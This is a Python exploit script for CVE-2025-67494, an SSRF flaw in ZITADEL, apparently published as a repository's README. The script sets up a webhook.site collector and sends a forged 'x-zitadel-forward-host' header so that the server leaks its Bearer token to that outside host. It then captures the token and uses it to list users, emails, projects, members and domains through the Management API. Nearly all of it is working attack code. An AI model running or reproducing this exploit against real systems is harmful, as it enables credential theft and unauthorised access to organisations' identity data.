README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval
"""
import requests
import json
import argparse
import time
from urllib.parse import urlparse
from pwn import log
SEARCH_QUERY = {"query": {"offset": "0", "limit": 10}}
class WebhookManager:
def __init__(self):
self.token = None
self.url = None
def create(self):
"""Create a webhook.site URL via API and return the token and URL"""
try:
response = requests.post("https://webhook.site/token", timeout=10)
if response.status_code in [200, 201]:
data = response.json()
token = data.get('uuid')
if token:
self.token = token
self.url = f"https://webhook.site/{token}"
return token, self.url
except Exception as e:
log.error(f"Error creating webhook: {e}")
return None, None
def get_requests(self, timeout=60):
"""Poll webhook.site API to get requests"""
if not self.token:
return None
url = f"https://webhook.site/token/{self.token}/requests"
start_time = time.time()
poll_interval = 5
last_check = 0
while time.time() - start_time < timeout:
elapsed = time.time() - start_time
try:
response = requests.get(url, timeout=10)
if response.status_code == 200:
data = response.json()
total = data.get('total', 0) if isinstance(data, dict) else 0
if total > last_check:
log.info(f"Webhook received {total} request(s)...")
last_check = total
if data and 'data' in data and len(data['data']) > 0:
return data['data']
remaining = int(timeout - elapsed)
if remaining > 0 and remaining % 10 == 0 and elapsed > 5:
log.info(f"Waiting for SSRF request... ({remaining}s remaining)")
except Exception as e:
log.error(f"Error polling webhook: {e}")
if elapsed < timeout:
time.sleep(poll_interval)
return None
def extract_bearer_token(self, requests_data):
"""Extract Bearer token from webhook requests"""
if not requests_data:
return None
for req in requests_data:
headers = req.get('headers', {})
if not headers:
continue
for key, value in headers.items():
if key.lower() == 'authorization':
auth_header = value
if isinstance(auth_header, list):
auth_header = auth_header[0] if auth_header else ""
if isinstance(auth_header, str) and auth_header.startswith('Bearer '):
return auth_header[7:]
return None
class SSRFExploiter:
def __init__(self, target_url):
self.target_url = target_url
def exploit(self, oob_host):
log.info(f"Exploiting SSRF to {self.target_url}")
log.info(f"OOB host: {oob_host}")
url = f"{self.target_url}/ui/v2/login"
headers = {"x-zitadel-forward-host": oob_host}
try:
response = requests.get(url, headers=headers, timeout=30)
log.success(f"SSRF request sent (status: {response.status_code})")
return True
except Exception as e:
log.error(f"Error during SSRF exploitation: {e}")
return False
def api_request(method="GET", endpoint="", error_msg=""):
"""Decorator for ZITADEL API requests"""
def decorator(func):
def wrapper(self, *args, **kwargs):
url = f"{self.base_url}/management/v1/{endpoint}"
headers = {"Authorization": f"Bearer {self.token}"}
payload = SEARCH_QUERY if method == "POST" else None
if payload:
headers["Content-Type"] = "application/json"
try:
req_func = requests.get if method == "GET" else requests.post
response = req_func(url, headers=headers, json=payload, timeout=10)
if response.status_code == 200:
return response.json()
except Exception as e:
if error_msg:
log.error(f"{error_msg}: {e}")
return None
return wrapper
return decorator
class ZitadelAPI:
def __init__(self, base_url, token):
self.base_url = base_url
self.token = token
@api_request(method="GET", endpoint="iam", error_msg="Error retrieving IAM info")
def get_iam_info(self):
pass
@api_request(method="GET", endpoint="orgs/me", error_msg="Error retrieving org info")
def get_org_info(self):
pass
@api_request(method="POST", endpoint="users/_search", error_msg="Error listing users")
def list_users(self):
pass
@api_request(method="POST", endpoint="projects/_search", error_msg="Error listing projects")
def list_projects(self):
pass
@api_request(method="POST", endpoint="orgs/me/members/_search", error_msg="Error listing members")
def list_org_members(self):
pass
@api_request(method="POST", endpoint="orgs/me/domains/_search", error_msg="Error listing domains")
def list_org_domains(self):
pass
def get_user_memberships(self, user_id):
return self._request(f"users/{user_id}/memberships/_search", "POST", SEARCH_QUERY, "Error retrieving memberships")
def _request(self, endpoint, method="GET", data=None, error_msg=""):
"""Generic function to make API requests to ZITADEL Management API"""
url = f"{self.base_url}/management/v1/{endpoint}"
headers = {"Authorization": f"Bearer {self.token}"}
if data:
headers["Content-Type"] = "application/json"
try:
func = requests.get if method == "GET" else requests.post
response = func(url, headers=headers, json=data, timeout=10)
if response.status_code == 200:
return response.json()
except Exception as e:
if error_msg:
log.error(f"{error_msg}: {e}")
return None
class DataFormatter:
@staticmethod
def _format_list(data, key='result', formatter=None):
if not data or key not in data or not data[key]:
return None
items = [formatter(item) for item in data[key] if formatter(item)]
return "\n".join(items) if items else None
@staticmethod
def format_iam_info(data):
if not data:
return None
gid = data.get('globalOrgId', 'N/A')
pid = data.get('iamProjectId', 'N/A')
did = data.get('defaultOrgId', 'N/A')
return f"Global Org ID: {gid}\nIAM Project ID: {pid}\nDefault Org ID: {did}"
@staticmethod
def format_org_info(data):
if not data or 'org' not in data:
return None
org = data['org']
oid = org.get('id', 'N/A')
name = org.get('name', 'N/A')
state = org.get('state', 'N/A')
domain = org.get('primaryDomain', 'N/A')
return f"ID: {oid}\nName: {name}\nState: {state}\nPrimary Domain: {domain}"
@staticmethod
def format_users(data):
def fmt_user(user):
user_type = "Machine" if 'machine' in user else "Human"
username = user.get('userName', 'N/A')
state = user.get('state', 'N/A')
if 'human' in user and 'email' in user['human']:
email = user['human']['email'].get('email', 'N/A')
return f"{user_type}: {username} ({email}) - {state}"
return f"{user_type}: {username} - {state}"
return DataFormatter._format_list(data, 'result', fmt_user)
@staticmethod
def format_projects(data):
def fmt_project(project):
return f"{project.get('name', 'N/A')} (ID: {project.get('id', 'N/A')}) - {project.get('state', 'N/A')}"
return DataFormatter._format_list(data, 'result', fmt_project)
@staticmethod
def format_members(data):
def fmt_member(member):
email = member.get('email', 'N/A')
roles = ", ".join(member.get('roles', []))
return f"{email} - Roles: {roles}"
return DataFormatter._format_list(data, 'result', fmt_member)
@staticmethod
def format_domains(data):
def fmt_domain(domain):
domain_name = domain.get('domainName', 'N/A')
verified = "Verified" if domain.get('isVerified') else "Not Verified"
primary = "Primary" if domain.get('isPrimary') else ""
return f"{domain_name} - {verified} {primary}".strip()
return DataFormatter._format_list(data, 'result', fmt_domain)
@staticmethod
def format_memberships(data):
def fmt_membership(membership):
org_name = membership.get('displayName', 'N/A')
roles = ", ".join(membership.get('roles', []))
iam = "IAM" if membership.get('iam') else "Org"
return f"{iam}: {org_name} - Roles: {roles}"
return DataFormatter._format_list(data, 'result', fmt_membership)
def print_info(title, data, formatter=None):
if not data:
return
log.info(f"\n{'='*60}")
log.info(f"{title}")
log.info(f"{'='*60}")
if formatter:
formatted = formatter(data)
if formatted:
log.info(formatted)
else:
print(json.dumps(data, indent=2, ensure_ascii=False))
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval")
parser.add_argument('-u', '--ui-url', required=True, help='ZITADEL Login UI URL (e.g., http://localhost:29000)')
parser.add_argument('-a', '--api-url', help='ZITADEL Management API URL (e.g., http://localhost:28080). If not provided, will be auto-detected from UI URL')
parser.add_argument('--timeout', type=int, default=60, help='Timeout in seconds (default: 60)')
args = parser.parse_args()
ui_url = args.ui_url
if args.api_url:
base_url = args.api_url
else:
parsed = urlparse(ui_url)
base_url = f"{parsed.scheme}://{parsed.hostname}:28080" if parsed.port == 29000 else f"{parsed.scheme}://{parsed.netloc}"
log.info("Starting CVE-2025-67494 exploit")
log.info(f"UI URL: {ui_url}, API URL: {base_url}")
webhook = WebhookManager()
log.info("Creating webhook.site URL via API...")
webhook_token, webhook_url = webhook.create()
if not webhook_token:
log.error("Failed to create webhook via API")
oob_host = f"{webhook_token}.webhook.site"
log.success(f"Webhook created: {webhook_url}")
log.info(f"OOB host: {oob_host}")
exploiter = SSRFExploiter(ui_url)
log.info("Sending SSRF request...")
exploiter.exploit(oob_host)
log.info(f"Polling webhook for Bearer token (timeout: {args.timeout}s)...")
requests_data = webhook.get_requests(args.timeout)
if not requests_data:
log.error(f"Timeout: No requests received within {args.timeout} seconds")
token = webhook.extract_bearer_token(requests_data)
if not token:
log.error("Bearer token not found in webhook requests")
log.success("Bearer token successfully retrieved!")
log.info(f"Token: {token[:50]}...")
log.info("Retrieving information via Management API...")
api = ZitadelAPI(base_url, token)
iam_info = api.get_iam_info()
print_info("IAM Information", iam_info, DataFormatter.format_iam_info)
org_info = api.get_org_info()
print_info("Organization Information", org_info, DataFormatter.format_org_info)
users = api.list_users()
print_info("Users", users, DataFormatter.format_users)
if users and 'result' in users and len(users['result']) > 0:
first_user_id = users['result'][0]['id']
memberships = api.get_user_memberships(first_user_id)
print_info(f"User Memberships (User ID: {first_user_id})", memberships, DataFormatter.format_memberships)
projects = api.list_projects()
print_info("Projects", projects, DataFormatter.format_projects)
members = api.list_org_members()
print_info("Organization Members", members, DataFormatter.format_members)
domains = api.list_org_domains()
print_info("Organization Domains", domains, DataFormatter.format_domains)
log.success("Exploitation completed successfully!")
if __name__ == "__main__":
main()